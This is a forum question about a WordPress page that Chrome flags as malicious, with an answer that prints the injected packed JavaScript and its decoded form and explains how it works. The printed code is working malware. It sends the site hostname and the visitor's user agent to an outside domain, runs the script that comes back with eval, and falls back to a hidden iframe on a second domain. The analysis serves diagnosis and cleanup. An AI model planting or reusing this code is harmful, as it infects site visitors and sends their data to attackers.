wordpressmalware
The site ahead contains malware
I'm getting an error with the WordPress page REMOVED, it seems that the website 2zz3.gq is being "injected" into the request but I'm not really sure when or how.
When I try to load the page on Chrome I see a "The site ahead contains malware" error:
But I see no error on Firefox or other browsers. How can I solve this issue? So far I have tried:
- Running WordFence Plugin for Malware removal (no infections found)
- Running Sucuri Security Plugin (also no threats found)
- I blocked incoming request from the website
2zz3.gq(apparently a server from Russia) but the error still appears on Chrome.
Could please someone give me some advice on this issue?
Solution
Is the plugin disabled now?
Check the source of your site to see if it has been modified in any way.
Easiest might be to restore a backup to ensure you don't miss any malicious changes.
WARNING
This is malicious code. I've put it on here for explanation purposes, but I'd recommend that you DO NOT execute this
It's not as bad as a link that someone might accidentally click, and I figure this warning should suffice for anyone who decides that pasting this into their JS console seems like a good idea...
I see the following packed code block when I curl your site.
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('26 25(7,13){15 9=7.80(13);10(9>78)49"76: 83 100 5";19 9}26 35(7){10(1!==85.22)49"93: 92 88 86 87";7=99(7);15 13,9,17=[],31=7.22-7.22%3;10(0===7.22)19 7;97(13=0;31>13;13+=3)9=25(7,13)<<16|25(7,13+1)<<8|25(7,13+2),17.28(20.21(9>>18)),17.28(20.21(9>>12&63)),17.28(20.21(9>>6&63)),17.28(20.21(63&9));96(7.22-31){74 1:9=25(7,13)<<16,17.28(20.21(9>>18)+20.21(9>>12&63)+33+33);77;74 2:9=25(7,13)<<16|25(7,13+1)<<8,17.28(20.21(9>>18)+20.21(9>>12&63)+20.21(9>>6&63)+33)}19 17.55("")}15 33="=",20="79+/",81="1.0";26 51(){15 11;37{11=39 68("82.70")}44(17){37{11=39 68("94.70")}44(95){11=90}}10(!11&&91 66!=\'89\'){11=39 66()}19 11}26 72(14){23=14.30(\'\\<54\');10(23==-1)19\'\';23=14.30(\'>\',23);10(23==-1)19\'\';23++;24=14.30(\'\\<\\/54\\>\',23);10(24==-1)19\'\';19 14.58(23,24)}26 64(14){10(14.30(\'%48%\')==-1)19 14;19 14.98(\'%48%\').55(36(35(62.65.75)))}26 60(56){15 27=" "+34.27;15 40=" "+56+"=";15 38=42;15 29=0;15 24=0;10(27.22>0){29=27.30(40);10(29!=-1){29+=40.22;24=27.30(";",29);10(24==-1){24=27.22}38=84(27.58(29,24))}}19(38)}34.107(\'<57 132="43"></57>\');10(60(\'133\')==42){15 32=\'50\'+\'7\'+\'45:\'+\'/\'+\'/\'+\'2\'+\'61\'+\'61\'+\'3\'+\'.\'+\'47\'+\'134\'+\'/\'+\'131\'+\'73\'+\'7.45\'+\'67\';32+=(\'?7=3&126=\'+36(35(62.65.125)));32+=(\'&101=\'+36(35(127.128)));37{15 11=51();11.129(\'136\',32,137);11.145=26(){10(11.146==4&&11.142==138){14=64(11.139);34.71("43").69=14;41=72(14);10(41.22>0)140(41)}};11.141(42)}44(17){34.71("43").69=\'<\'+\'59\'+\'46\'+\'144 124\'+\'108\'+\'="52\'+\'109\'+\':/\'+\'/\'+\'110\'+\'2\'+\'-\'+\'53\'+\'102\'+\'53\'+\'.\'+\'47\'+\'73\'+\'/\'+\'103\'+\'104\'+\'112\'+\'.45\'+\'67"\'+\' 113\'+\'121=\'+\'"0\'+\'" 122\'+\'119\'+\'7="0\'+\'" 46\'+\'118\'+\'114\'+\'31="\'+\'0" 115\'+\'116\'+\'117\'+\'52="\'+\'0" 123\'+\'120\'+\'105\'+\'50="\'+\'0" 106\'+\'111\'+\'143\'+\'47="\'+\'130\'+\'">\'+\'<\'+\'/\'+\'59\'+\'46\'+\'135\'+\'17\'+\'>\'}}',10,147,'|||||||t||_|if|xmlhttp||A|src|var||e||return|_ALPHA|charAt|length|start|end|_pref_xxs_getbyte|function|cookie|push|offset|indexOf|r|url|_PADCHAR|document|_pref_xxs_encode64|encodeURIComponent|try|setStr|new|search|code|null|statspan_0_1|catch|p|fr|g|ENCURL|throw|ht|_pref_xxs_getXmlHttp|h|b|script|join|name|span|substring|i|_pref_xxs_getCookie|z|window||_pref_xxs_processMacro|location|XMLHttpRequest|hp|ActiveXObject|innerHTML|XMLHTTP|getElementById|_pref_xxs_extractScript|a|case|href|INVALID_CHARACTER_ERR|break|255|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|charCodeAt|_VERSION|Msxml2|DOM|unescape|arguments|argument|required|one|undefined|false|typeof|exactly|SyntaxError|Microsoft|E|switch|for|split|String|Exception|ua|o|co|un|nheig|sc|write|rc|ttp|l|rol|ter|wid|rde|mar|ginw|idt|amebo|gh|rgi|th|hei|ma|s|hostname|d|navigator|userAgent|open|no|st|id|stat01|q|am|GET|true|200|responseText|eval|send|status|lin|ame|onreadystatechange|readyState'.split('|'),0,{}))
which translates to
function _pref_xxs_getbyte(t,A)
{
var _=t.charCodeAt(A);
if(_>255)throw"INVALID_CHARACTER_ERR: DOM Exception 5";
return _
}
function _pref_xxs_encode64(t)
{
if(1!==arguments.length)throw"SyntaxError: exactly one argument required";
t=String(t);
var A,_,e=[],r=t.length-t.length%3;
if(0===t.length)return t;
for(A=0;
r>A;
A+=3)_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8|_pref_xxs_getbyte(t,A+2),e.push(_ALPHA.charAt(_>>18)),e.push(_ALPHA.charAt(_>>12&63)),e.push(_ALPHA.charAt(_>>6&63)),e.push(_ALPHA.charAt(63&_));
switch(t.length-r)
{
case 1:_=_pref_xxs_getbyte(t,A)<<16,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_PADCHAR+_PADCHAR);
break;
case 2:_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_ALPHA.charAt(_>>6&63)+_PADCHAR)
}
return e.join("")
}
var _PADCHAR="=",_ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_VERSION="1.0";
function _pref_xxs_getXmlHttp()
{
var xmlhttp;
try
{
xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
}
catch(e)
{
try
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
}
catch(E)
{
xmlhttp=false
}
}
if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
{
xmlhttp=new XMLHttpRequest()
}
return xmlhttp
}
function _pref_xxs_extractScript(src)
{
start=src.indexOf('\<script');
if(start==-1)return'';
start=src.indexOf('>',start);
if(start==-1)return'';
start++;
end=src.indexOf('\<\/script\>',start);
if(end==-1)return'';
return src.substring(start,end)
}
function _pref_xxs_processMacro(src)
{
if(src.indexOf('%ENCURL%')==-1)return src;
return src.split('%ENCURL%').join(encodeURIComponent(_pref_xxs_encode64(window.location.href)))
}
function _pref_xxs_getCookie(name)
{
var cookie=" "+document.cookie;
var search=" "+name+"=";
var setStr=null;
var offset=0;
var end=0;
if(cookie.length>0)
{
offset=cookie.indexOf(search);
if(offset!=-1)
{
offset+=search.length;
end=cookie.indexOf(";
",offset);
if(end==-1)
{
end=cookie.length
}
setStr=unescape(cookie.substring(offset,end))
}
}
return(setStr)
}
document.write('<span id="statspan_0_1"></span>');
if(_pref_xxs_getCookie('stat01')==null)
{
var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
url+=('?t=3&d='+encodeURIComponent(_pref_xxs_encode64(window.location.hostname)));
url+=('&ua='+encodeURIComponent(_pref_xxs_encode64(navigator.userAgent)));
try
{
var xmlhttp=_pref_xxs_getXmlHttp();
xmlhttp.open('GET',url,true);
xmlhttp.onreadystatechange=function()
{
if(xmlhttp.readyState==4&&xmlhttp.status==200)
{
src=_pref_xxs_processMacro(xmlhttp.responseText);
document.getElementById("statspan_0_1").innerHTML=src;
code=_pref_xxs_extractScript(src);
if(code.length>0)eval(code)
}
};
xmlhttp.send(null)
}
catch(e)
{
document.getElementById("statspan_0_1").innerHTML='<'+'i'+'fr'+'ame s'+'rc'+'="h'+'ttp'+':/'+'/'+'l'+'2'+'-'+'b'+'o'+'b'+'.'+'g'+'a'+'/'+'co'+'un'+'ter'+'.p'+'hp"'+' wid'+'th='+'"0'+'" hei'+'gh'+'t="0'+'" fr'+'amebo'+'rde'+'r="'+'0" mar'+'ginw'+'idt'+'h="'+'0" ma'+'rgi'+'nheig'+'ht="'+'0" sc'+'rol'+'lin'+'g="'+'no'+'">'+'<'+'/'+'i'+'fr'+'am'+'e'+'>'
}
}
Note the line
var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
which actually constructs the 2***.gq url. 1
If you don't have a stat01 cookie set, it loads stat.php from there (presumably malicious JS source) and executes it using eval.
In the process of making the request, it also sends up some user data (for metrics, loading proper exploit code, or something else?), including the current hostname and the useragent of the user's browser.
Note that, should this fail, it also falls back on loading a URL at another domain l2***.ga/counter.php1 in an iframe.
1 link purposely broken, see source if you're interested
- WooCommerce order status hook not triggering
- wp_mail wordpress html with style not aplying
- How to change title when toggle is active in Elementor Page Builder
- How can I get a post by title in Wordpress?
- Access denied for user 'root@localhost' (using password:NO)
- Woocommerce not using the right templates
- Wordpress blog is now showing Install page ? the db is still there and wp-config has correct details
- Get WordPress version from meta tag with name="generator"
- preg_replace regular expression HTML
- WordPress plugin to output a certain category on content page tweak help
- Customize specific shipping method costs not being applied to WooCommerce totals
- Sync lesson completion status across all courses in LearnDash
- Issue with woocommerce parent child category url
- Allow Free shipping based on shippable items minimal subtotal with progress bar
- Wordpress change all 404 to 410 error code
- How to display related post by categories with next post of current post (don't latest post or random post)
- Custom content include function and apply_filters
- Wordpress Mysql query to replace empty alt img with post_title
- How to make twenty-seventeen pages content full width
- Get payment gateway related data in Woocommerce
- Configure nginx using reverse_proxy and wordgpress for subdirectory /blog
- Create a WooCommerce Order Programmatically adding normal products and gifted products
- Wordpress: Check if there are previous posts before displaying link
- Importing node modules in a WordPress plugin
- WordPress Editor not updating files: Unable to communicate back with site to check for fatal errors
- Get Authors Randomly
- Wordpress foreach loop in pagination query
- How to get current date and time in WordPress?
- How to duplicate pages in Wordpress with Astra theme?
- WooCommerce: Cart price override with text